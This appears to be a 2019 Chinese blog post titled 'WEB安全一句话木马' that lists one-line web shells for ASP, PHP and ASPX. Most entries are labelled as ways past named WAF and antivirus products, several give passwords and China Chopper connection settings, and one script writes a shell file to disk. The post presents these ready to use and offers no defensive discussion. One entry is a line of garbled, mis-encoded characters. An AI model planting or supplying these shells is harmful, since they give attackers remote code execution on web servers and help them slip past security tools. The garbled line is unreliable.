WEB安全一句话木马

发表于:2019-09-23

ASP

普通一句话
<%eval request("8888")%>

突破安全狗的一句话
<%Y=request("x")%> <%eval(Y)%>

数据库加密一句话(密码a)
┼攠數畣整爠煥敵瑳∨≡┩愾        ┼癥污爠煥敵瑳∨≡┩愾

网站配置、版权信息专用一句话
"%><%Eval Request(x)%>

一句话再过护卫神
<%Y=request("x")%> <%execute(Y)%>

过拦截一句话木马
<% eXEcGlOBaL ReQuEsT("x") %>

闭合型一句话 
%><%eval request("0o1Znz1ow")%><%

php

普通一句话
<?php eval($_POST[8888]);?>

过安全狗的php一句话
<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST[8888]); ?>

高强度一句话
<?php substr(md5($_REQUEST['8888']),28)=='acd0'&&eval($_REQUEST['c']);?>

新型变异一句话(密码b4dboy)
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

PHP高强度一句话(菜刀连接:/x.php?x=lostwolf 脚本类型:php 密码:c):
<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['c']);?>

后台常用写入一句话(密码x):
<? 
$fp = @fopen("c.php", 'a'); 
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[x])'."\r\n\r\n?".">\r\n"); 
@fclose($fp); 
?>

突破护卫神,保护盾一句话:
<?php $a = str_replace(x,"","axsxxsxexrxxt");
$a($_POST[“test”]); ?>

这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错
<?php ($_=@$_GET[2]).@$_($_POST[1])?>

aspx

普通一句话
<%@ Page Language="Jscript"%><%eval(Request.Item["8888"],"unsafe");%>

突破安全狗的aspx一句话
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

可以躲过雷客图的一句话
<%

set ms = server.CreateObject("MSScriptControl.ScriptControl.1")

ms.Language="VBScript"

ms.AddObject "Response", Response

ms.AddObject "request", request

ms.ExecuteStatement("ev"&"al(request(""1""))")

%>
WEB安全